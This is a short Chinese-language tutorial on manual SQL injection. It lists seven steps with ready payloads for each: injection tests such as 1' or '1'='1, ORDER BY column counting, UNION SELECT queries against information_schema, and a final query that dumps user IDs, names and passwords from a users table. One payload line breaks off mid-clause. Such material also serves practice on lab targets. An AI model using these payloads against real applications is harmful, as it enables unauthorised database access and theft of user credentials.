手工注入常规思路:
1.判断是否存在注入,注入是字符型还是数字型
2.猜解 SQL 查询语句中的字段数
3.确定显示的字段顺序
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.查询到账户的数据
1.判断是否存在注入,注入是字符型还是数字型
1
1' or '1'='1
1’and ‘1’ =’2
1 or 1=1
2.猜解SQL查询语句中的字段数
1′ or 1=1 order by 1 #
1′ or 1=1 order by 2 #
...
3.确定显示的字段顺序
1′ union select 1,2 #
4.获取当前数据库
1′ union select 1,database() #
5.获取数据库中的表
1′ union select 1,group_concat(table_name) from information_schema.tables where table
6.获取表中的字段名
1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #
7.下载数据
1′ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
网友评论